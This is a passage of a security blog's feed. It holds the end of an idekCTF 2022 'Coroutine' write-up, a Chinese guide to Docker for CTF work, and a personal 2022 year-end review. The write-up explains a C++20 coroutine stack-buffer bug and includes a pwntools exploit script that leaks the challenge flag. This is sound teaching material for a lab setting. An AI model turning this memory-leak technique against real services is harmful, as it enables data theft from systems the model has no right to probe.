class="string">&quot;client_loop buffer before RecvAsync: %p\n&quot;</span>, buffer);</span><br><span class="line">        <span class="type">int</span> recved = <span class="keyword">co_await</span> <span class="built_in">RecvAsync</span>(ctx, socket, buffer);</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Output: client_loop buffer before RecvAsync: 0x5603212fff89</p></blockquote><p>This output indicates that the buffers in the coroutine will be <strong>created in the heap</strong>. In other words, this entire coroutine function is actually equivalent to a heap structure. This is the reason why a coroutine can suspend and resume execution at different times, because it preserves the context when it is created.</p><p>However, after carefully checking each buffer’s address, I found that the <strong>coroutine did not capture the <code>buffer2</code> in function <code>SendAllAsyncNewline</code></strong>. In other words, the address of <code>buffer2</code> is located on the <strong>stack</strong>, which is <strong>not far from the memory location storing the flag</strong> (&lt; 512 byte, 0x200).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">load_flag</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">400</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;load_flag: %p\n&quot;</span>, flag);</span><br><span class="line">    FILE* fp = <span class="built_in">fopen</span>(<span class="string">&quot;flag&quot;</span>, <span class="string">&quot;rt&quot;</span>);</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">    <span class="built_in">fclose</span>(fp);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">SendAllAsyncNewline</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket, std::span&lt;std::byte&gt; buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    std::byte buffer2[<span class="number">513</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;SendAllAsyncNewline buffer: %p\n&quot;</span>, buffer.<span class="built_in">data</span>());</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;SendAllAsyncNewline buffer2: %p\n&quot;</span>, buffer2);</span><br><span class="line">    std::<span class="built_in">copy</span>(buffer.<span class="built_in">begin</span>(), buffer.<span class="built_in">end</span>(), buffer2);</span><br><span class="line">    buffer2[buffer.<span class="built_in">size</span>()] = (std::byte)<span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">SendAllAsync</span>(ctx, socket, std::<span class="built_in">span</span>(buffer2, buffer.<span class="built_in">size</span>()<span class="number">+1</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Output:</p><ul><li><p>SendAllAsyncNewline buffer: 0x559806712f89</p></li><li><p>SendAllAsyncNewline buffer2: <strong>0x7ffc1ddfd3a0</strong></p></li><li><p>load_flag: <strong>0x7ffc1ddfd480</strong></p></li></ul></blockquote><p>And <code>SendAllAsync</code> will also <strong>send data multiple times</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">SendAllAsync</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket, std::span&lt;std::byte&gt; buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> offset = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (offset &lt; buffer.<span class="built_in">size</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">int</span> result = <span class="keyword">co_await</span> <span class="built_in">SendAsync</span>(ctx, socket, std::<span class="built_in">span</span>(buffer.<span class="built_in">data</span>() + offset, buffer.<span class="built_in">size</span>() - offset));</span><br><span class="line">        <span class="keyword">if</span> (result == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">co_return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        offset += result;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">co_return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If we can carefully interact with proxy, we can leak the flag by the  following process:</p><ol><li>During the two <code>SendAsync</code> execution intervals in <code>SendAllAsync</code>, returning the control flow to <code>run_until_done</code> by filling the socket buffer in advance.</li><li>Executing <code>load_flag</code> function to load the flag into stack memory, which happens to overlap with <code>buffer2</code> .</li><li>Clean the proxy receive buffer, so that the program can continue to send <code>buffer2</code> to the client. Since we have loaded the flag into <code>buffer2</code> before sending, the flag will be output along with it.</li></ol><h2 id="Exploit">Exploit</h2><p>Once you have found <strong>the threshold for sending data length</strong> in docker, all the difficulties in challenge are solved.</p><blockquote><p>Note: you can find the sending threshold more easier by modifying the source code, as you wish.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = remote(&quot;coroutine.chal.idek.team&quot;, 1337)</span></span><br><span class="line">io = process(<span class="string">&quot;python3 proxy.py&quot;</span>, shell=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">context(terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>], os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;info&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Change Receive Buffer</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;2&quot;</span>)</span><br><span class="line"><span class="comment"># Change Receive Buffer size to the minimal size</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Buffer size&gt; &quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Connect</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Filling the proxy recevie buffer and remote send buffer.</span></span><br><span class="line">send_size = <span class="number">5</span> * <span class="number">512</span> + <span class="number">314</span> <span class="comment"># 0xb3a</span></span><br><span class="line"><span class="keyword">while</span> send_size &gt; <span class="number">0</span>:</span><br><span class="line">    current_send_size = <span class="built_in">min</span>(<span class="number">512</span>, send_size)</span><br><span class="line">    send_size -= current_send_size</span><br><span class="line">    </span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Data&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * current_send_size)</span><br><span class="line">    </span><br><span class="line"><span class="comment"># As proxy recevie buffer and remote send buffer are filled</span></span><br><span class="line"><span class="comment"># The `SendAllAsync` will be suspend and run `load_flag`</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">&quot;Data&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">512</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Read the receive buffer, and `SendAllAsync` will be resume to send the flag.</span></span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    <span class="built_in">print</span>(io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;5&quot;</span>))</span><br><span class="line">    <span class="built_in">print</span>(io.sendlineafter(<span class="string">&quot;Size&gt;&quot;</span>, <span class="string">b&#x27;4096&#x27;</span>))</span><br></pre></td></tr></table></figure><p>You can read the flag <code>idek&#123;exploiting_coroutines&#125;</code> in the proxy receive data.</p><p>In fact, I did not write any python script for exploit when solving this challenge. Instead, I was interacting directly with the remote server using <code>nc</code>. So I wrote the above exploit script based on previous interaction logs.</p><p><img src="/2023/01/idek_coroutine/image-20230121133235895.png" alt="image-20230121133235895"></p><h2 id="Reference">Reference</h2><ul><li><a href="https://zhuanlan.zhihu.com/p/497224333">C++20协程原理和应用 - CSDN</a></li><li><a href="https://www.incredibuild.cn/blog/cppxiechengshizhanyanshi">C++ 协程——实战演示 - incredibuild</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;Introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Last weekend I participated in &lt;code&gt;idekCTF 2022&lt;/code&gt; with r3kapig. After briefly browsing other pwn challenges, I tried to solve &lt;code&gt;Coroutine&lt;/code&gt; and finally solved it (4 sovled in total).&lt;/p&gt;
&lt;p&gt;Now, let’s dive into this challenge!&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>CTF Docker 小记</title>
    <link href="https://kiprey.github.io/2023/01/docker/"/>
    <id>https://kiprey.github.io/2023/01/docker/</id>
    <published>2023-01-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.996Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>每次玩玩 CTF 时总是会因为 Docker 速度慢、忘记命令等等使自己非常抗拒启 Docker 环境，但是没有 Docker 环境实操题目就又成了纸上谈兵。</p><p>因此趁着 RealworldCTF 5th 来熟悉并记录一下 Docker 的使用，感兴趣的 pwn 手可以一起实操一下 docker。</p><span id="more"></span><h2 id="Docker-管理命令">Docker 管理命令</h2><ul><li><p><code>docker image list --all</code> ：查看各种 image</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜ docker image list                        </span><br><span class="line">REPOSITORY   TAG        IMAGE ID       CREATED         SIZE</span><br><span class="line">&lt;none&gt;       &lt;none&gt;     cc3193e40804   8 minutes ago   121MB</span><br><span class="line">&lt;none&gt;       &lt;none&gt;     fd184cbecbe0   3 months ago    72.8MB</span><br><span class="line">ubuntu       20.04      a0ce5a295b63   4 months ago    72.8MB</span><br><span class="line">python       3.6-slim   c1e40b69532f   12 months ago   119MB</span><br><span class="line">ubuntu       14.04      13b66b487594   21 months ago   197MB</span><br></pre></td></tr></table></figure><p><code>docker image rm &lt;image-id&gt;</code> ：删除特定 image</p></li><li><p><code>docker container list --all</code> ：查看当前所有容器。</p><blockquote><p>和 <code>docker ps -a</code> 等价。</p></blockquote><p><code>docker container rm &lt;container-id&gt;</code> ：删除容器</p><blockquote><p>和 <code>docker rm &lt;container-id&gt;</code> 等价。</p></blockquote></li><li><p><code>docker build -t &lt;name&gt; .</code>：构建当前目录下 Dockerfile 的 image，并将该 image 命名为 <code>&lt;name&gt;</code></p></li><li><p><code>docker run &lt;args...&gt; &lt;image-id&gt; [cmd]</code>：从 image 构建出新的容器，并执行 cmd （如果有）。</p></li><li><p><code>docker start -i &lt;container-id&gt;</code>：在交互模式下启动容器。</p></li><li><p><code>docker stop &lt;container-id&gt;</code>：停止当前正在运行的容器。</p></li><li><p><code>docker save -o &lt;export_fspath&gt; &lt;image-id&gt;</code>：导出 image 至文件路径 <code>&lt;export_fspath&gt;</code> 处</p></li><li><p><code>docker load -i &lt;import_fspath&gt;</code>：导入外部 image 文件至 docker 中。通常这两步导入导出和 docker tar 有关。</p></li><li><p><code>docker exec -it &lt;container-id&gt; &lt;cmd&gt;</code>： 在某个<strong>正在运行</strong>的容器中执行命令</p><blockquote><p>在非运行状态下容器执行命令则需要先用 docker start 启动容器再去执行 docker exec</p></blockquote></li></ul><h2 id="Dockerfile-相关">Dockerfile 相关</h2><ul><li><p>Docker 换源</p><ol><li><p><code>sudo nano /etc/docker/daemon.json</code></p><p>写入以下内容</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;registry-mirrors&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="string">&quot;https://yxzrazem.mirror.aliyuncs.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;http://hub-mirror.c.163.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;https://registry.docker-cn.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;http://hub-mirror.c.163.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;https://docker.mirrors.ustc.edu.cn&quot;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><blockquote><p>上面那个奇怪的阿里云镜像地址是 <strong>阿里云镜像加速器专属地址</strong>。这里我直接抄了别人的，反正还有其他几个源，这个不行其他还能继续用。</p></blockquote></li><li><p>重启 docker 服务</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> service docker restart</span><br></pre></td></tr></table></figure><blockquote><p>注：如果宿主机能连接网络但是 docker 无法连接， 则重启docker服务就能解决该问题。</p></blockquote></li></ol></li><li><p>Dockerfile 替换 apt 源</p><p>默认 apt 源的下载速度非常感人，因此需要额外添加几句来替换默认 apt 源。</p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">cat</span> /etc/apt/sources.list</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> sed -i s@/archive.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/security.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/security.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; apt-get clean</span></span><br></pre></td></tr></table></figure></li><li><p>Dockerfile 替换 pip 源</p><p>在 Dockerfile 中添加以下代码：</p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">mkdir</span> ~/.pip &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">cd</span> ~/.pip/  &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">echo</span> <span class="string">&quot;[global] \ntrusted-host =  pypi.douban.com \nindex-url = http://pypi.douban.com/simple&quot;</span> &gt;  pip.conf</span></span><br></pre></td></tr></table></figure></li><li><p>Dockerfile 网络加速</p><ul><li><p>github 加速：可以使用 <a href="https://gh.api.99988866.xyz/">GitHub 文件加速</a> 网站来生成加速后的 github 文件下载链接。</p></li><li><p>Docker 配置代理：可以参考这个 <a href="https://blog.csdn.net/qq_39698985/article/details/123748820">Docker 配置网络代理 - CSDN</a></p></li></ul></li><li><p>Dockerfile 构建 image</p><p>在 Dockerfile 所在文件夹下，运行 <code>docker build -t chal .</code> 以构建 docker 实例。</p><p>这里指定了构建好后的 image 名称为 <code>chal</code>，便于后面启动实例时指定名称，而不用再去查找 image id。</p></li><li><p><strong>构建</strong> Docker 容器并启动</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -i 交互模式</span></span><br><span class="line"><span class="comment"># -t 分配伪终端</span></span><br><span class="line"><span class="comment"># -name 指定所启动 container 的名称</span></span><br><span class="line"><span class="comment"># -d 后台运行容器，通常这个选项我们几乎用不到(detach 分离模式)</span></span><br><span class="line"><span class="comment"># –privileged=true 提升系统执行权限</span></span><br><span class="line"><span class="comment"># -p 宿主机端口:容器端口  端口映射</span></span><br><span class="line"><span class="comment"># -v 本地路径：容器路径 路径映射</span></span><br><span class="line">docker run -name &lt;container-name&gt; -it &lt;image-name&gt; [cmd]</span><br></pre></td></tr></table></figure><p>例如</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --name paddle_chal_container paddle_chal:latest</span><br></pre></td></tr></table></figure><blockquote><p>如果 docker run 末尾不额外携带运行的命令，并且 Dockerfile 中带有 CMD 命令（例如 <code>CMD [&quot;python&quot;, &quot;web_service.py&quot;]</code>），则 docker run 将会自动运行该命令。</p></blockquote><p>注意，最好不要通过在 Dockerfile 末尾添加 <code>CMD [&quot;/bin/bash&quot;]</code> 来启动终端，因为这样启动的终端<strong>退格键将被转义</strong>无法使用。</p><p>当通过 docker run 成功<strong>构建并启动</strong>容器后，该命令将不可再被二次执行（因为该命令包含了构建容器这一步，而现在容器已经构建好了），后面想再启动所构建好的容器，则需要执行 <code>docker start -i &lt;container&gt;</code>。</p><p>可以参考 <a href="https://m.runoob.com/docker/docker-run-command.html">docker run - 菜鸟教程</a> 查看更多参数信息。</p></li></ul><h2 id="Dockerfile-格式">Dockerfile 格式</h2><p>如果有小小伙伴想自制 Dockerfile 则需要了解一下其中的各个命令。</p><p>这里直接参考这个 <a href="https://developer.aliyun.com/article/484262">Dockerfile格式以及Dockerfile示例 - 阿里云开发者社区</a>，非常全面，我就不再贴了。</p><h2 id="CTF-调试">CTF 调试</h2><p>CTF 调试最重要的无非两步，调试器和编辑器。</p><p>先启动一下 docker 容器：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 启动容器。这里没有指定 -i 交互模式，因此容器将进入后台运行</span></span><br><span class="line">docker start &lt;container-id&gt;</span><br><span class="line"><span class="comment"># 在已运行容器中启动 bash</span></span><br><span class="line">docker <span class="built_in">exec</span> -i &lt;container-id&gt; /bin/bash</span><br></pre></td></tr></table></figure><p>bash 执行成功后<strong>不会有任何提示</strong>，需要自行输入 <code>whoami</code> 等命令来测试是否已经成功。</p><blockquote><p>不要使用 ls 来测试，因为可能当前文件夹下没有文件，误导人判断错误。</p></blockquote><h3 id="调试器配置">调试器配置</h3><p>首先是调试器，这里直接在 docker 中执行安装 pwndbg 的过程即可，无需将这个安装过程写到 dockerfile 中：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 此时是 root 权限，因此无需 sudo</span></span><br><span class="line">apt-get update</span><br><span class="line">apt-get install git</span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> ~</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/pwndbg/pwndbg</span><br><span class="line"><span class="built_in">cd</span> pwndbg</span><br><span class="line">./setup.sh</span><br><span class="line"></span><br><span class="line"><span class="comment"># 安装 pwntools</span></span><br><span class="line">pip3 install pwntools</span><br></pre></td></tr></table></figure><h3 id="编辑器配置">编辑器配置</h3><p>这里首选 VSCode，VSCode 中包含了丰富的 Docker 插件可用于管理与处理容器。</p><p>参照 <a href="https://zhuanlan.zhihu.com/p/496213879">VsCode在Docker中进行开发 - 知乎</a>，在 VSCode 中安装 <code>Docker</code> 和 <code>Dev Containers</code>。</p><p>安装好后即可直接通过宿主机的 VSCode 来附加至 Docker 容器中：</p><p><img src="/2023/01/docker/image-20230108121448976.png" alt="image-20230108121448976"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;p&gt;每次玩玩 CTF 时总是会因为 Docker 速度慢、忘记命令等等使自己非常抗拒启 Docker 环境，但是没有 Docker 环境实操题目就又成了纸上谈兵。&lt;/p&gt;
&lt;p&gt;因此趁着 RealworldCTF 5th 来熟悉并记录一下 Docker 的使用，感兴趣的 pwn 手可以一起实操一下 docker。&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>2022年年终总结</title>
    <link href="https://kiprey.github.io/2023/01/2022-summary/"/>
    <id>https://kiprey.github.io/2023/01/2022-summary/</id>
    <published>2023-01-04T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.729Z</updated>
    
    <content type="html"><![CDATA[<p>2022 年年终总结</p><span id="more"></span><h2 id="2021-11-29">2021.11.29</h2><p>在阅读论文的这段过程里，我慢慢对<strong>安全研究</strong>有了更深层次的体会。之前一个老师和我说，“<strong>挖洞不是安全研究</strong>，<strong>研究研究，研究的对象应该是一个有规律的东西</strong>，例如数学物理等”，当时的我尚未明白。直到现在，我们慢慢了解了，其实安全研究，本质上是研究某些东西或某些领域如何做的更好，达到更好的效果，例如 fuzz 出更好的覆盖率或者提出更好的防护手段。</p><p>而挖洞，与其说是研究，更不如说是在现有安全研究的成果之上，所进行的一种<strong>行为</strong>。例如 e9afl 基于 <strong>e9patch 这一个安全研究的产出</strong>，对闭源产品进行插桩 fuzz，完全达到开源代码插桩 fuzz 的效果。</p><p>这样看来，安全研究确实是有规律的，比如这周刚刚看完的 healer（一个 kernel fuzz）。</p><ul><li>现有问题：生成的 syscall 序列覆盖率不够高</li><li>提出想法：尝试获取 syscall 之间的显式关系和（最重要的）<strong>隐式关系</strong>，以提高覆盖率</li><li>实现方法：分析 syzlang 获取显式关系，通过覆盖率反馈和覆盖率变化检测来获取隐式关系。</li></ul><p>这样一条 <strong>提出问题-&gt;解决方法-&gt;实现过程</strong>的链就这么串起来了。</p><p>实际上，个人认为安全研究和挖洞应该是相互包容的关系，不可分割。企业中<strong>安全研究</strong>的这个<strong>职业</strong>，我们通常指的是<strong>挖洞选手</strong>。而要想挖出别人没挖到的二进制漏洞，那就必须深扎<strong>安全研究</strong>，将某个新颖想法从提出变成实现。而安全研究也常常需要**几十个 CVE或挖到了更难挖出的洞（或别人挖不出的洞）**来证明某个成果的成功性，现有的漏洞猎人也是站在当前安全研究的进度上进行漏洞挖掘，例如 Address Sanitizer 这个相当优秀的内存检测工具，在现在的二进制挖洞环境下，处处都有它的影子。而它也曾是通过安全研究所提出来的一种简单想法，并最终逐步发展成一个非常完备的工具。</p><p>我曾在读研深造和直接就业这二者间徘徊过，不过随着暑期玄武的这段经历以及后续我阅读论文慢慢产生的一点想法来看，我已经逐渐坚定了自己读研的方向，想再潜心搞搞三年安全研究，尤其是漏洞挖掘与防护。个人认为读研不能<strong>为了读研而读研</strong>，没有目的的读研其实没有什么意思，而且很容易荒废掉自己的时间。在确定了自己的目的与方向后，我相信未来的研究将会充满着乐趣，因为研究自己感兴趣的东西是真的很容易上瘾（兴趣驱动型）。</p><p>不过虽然我站在现在的角度上理这一整套想法，可能还是存在着较大的局限性，但是我还是想把这段话留在这里，也算作一个标志。在未来的某个阶段我再回头看看当时的想法，说不定又有什么全新的体会。</p><h2 id="2022年终总结">2022年终总结</h2><blockquote><p>第一次写年终总结，有点不知道咋写，搓手手，就按照流水账的形式想到啥写啥吧。</p></blockquote><p>上面这段是我在2021年年底有感而发写下的内容，可能有些水话或者自己也说不太清楚道理的语句（笑），随便看看。当时的我也曾在就业和升学中徘徊，之前想升学主要是有保研名额，不升学白不升；后来也在腾讯实习期间动摇过是否就业也是种选择。2021年年底从腾讯回来后紧接着就是准备搞科研（大三上学期），当时搞科研也是稀里糊涂，纯粹是因为大家都搞了所以就跟着大流联系老师搞，因此大三上学期的校内科研精力其实没有太多激情，感觉自己也不知道在搞什么（老师可能也比较头疼怎么安排任务hhh）。但这段时间确确实实让我有了更进一步阅读论文的契机，让我开始慢慢习惯阅读论文。回想起大二寒假第一次实习时，单单精读一篇论文汇报就花了有半个月的时间，现在确实小有进展。</p><p>后来2021年11月底，我准备了半个月的文书，读了一些论文，申请了清华网研院的科研实习。当初也因为很多原因踌躇过，犹豫过，但最后还是一句“不试试怎么知道呢”，投递出了实习申请。那段时间为了一篇文书、一份简历找了很多老师同学等寻求修改意见，也读了心仪导师相关工作的几篇论文，写了笔记，只为能让邮件中*“对老师目前的研究有了进一步了解”*这句话尽可能的真实。不过幸好，结果是好的，我成功申请进入 NISL 参与实习。（这里需要感谢一下我的神仙导师）</p><p>2022年上半年的时间基本上都花在了课程任务与科研实习上。这半年时间过得还算惬意，上完课回来就帮帮学姐做做实验，要是空闲的话打打 CTF ，研究一手新技术，或者看看论文啥的，还在学姐的鼓励下在 NISL 公开学术沙龙中做了一次论文分享。不过令我感到惊讶的是，因为我博客一直都在维护，5月份时我收到了华为 HR 的实习邀请、清华 ucore 作者的邮件联络；9月份时收到了上交 GOSSIP 组的实习邀请，以及10月份Water Paddler国际CTF战队的邀约。这些都是我曾经从未经历过的，惊奇之余也激励着我继续向前。</p><p>下半年的时间主要聚焦在保研流程中。准备材料、投递夏令营、准备洛谷机试等等，具体细节不一一做表。保研的这几个月也是折腾了很久，最麻烦的就是填写每份材料并投递出去，同时也要多发邮件联系老师寻求机会。不过索性结果还算顺利，虽然机考炸了只吃了个低保分，但硕士排名位于15/20 还是成功保研去清华网研院攻读硕士。结果出来的那一刻心里古井无波，已经没有了悲喜，只是感慨保研终于结束了。女朋友也保研去了北航，和清华仅仅隔着一条街，硕士入学后买辆小电驴就可以经常快乐相见了。</p><p>这一年主要面对着对保研的迷茫与压力。接下来，当决定了未来三年的去向、决定了自己接下来的研究方向后，后面的旅途也变得不再迷茫。但压力也确实是有的，来自多个方向的压力推着我，让我如履薄冰，不敢停下。保研结束后我也感受到自己的精力不再像是前两年那么充沛，这之中可能有心态的变化，但我更觉得跟长期熬夜导致的身体条件有关。年轻人要多锻炼少熬夜，只叹自己虽知但不容易做到。</p><p><em>长风破浪会有时,直挂云帆济沧海</em>。2023年是新的一年，希望自己可以在新的一年中将自己的科研工作做到更好，同时也挖到更多的洞，在安全这条路上走得更远。</p><p>共勉。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;2022 年年终总结&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>2022年信息安全专业保研历程</title>
    <link href="https://kiprey.github.io/2022/11/baoyan-note/"/>
    <id>https://kiprey.github.io/2022/11/baoyan-note/</id>
    <published>2022-11-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.816Z</updated>
    
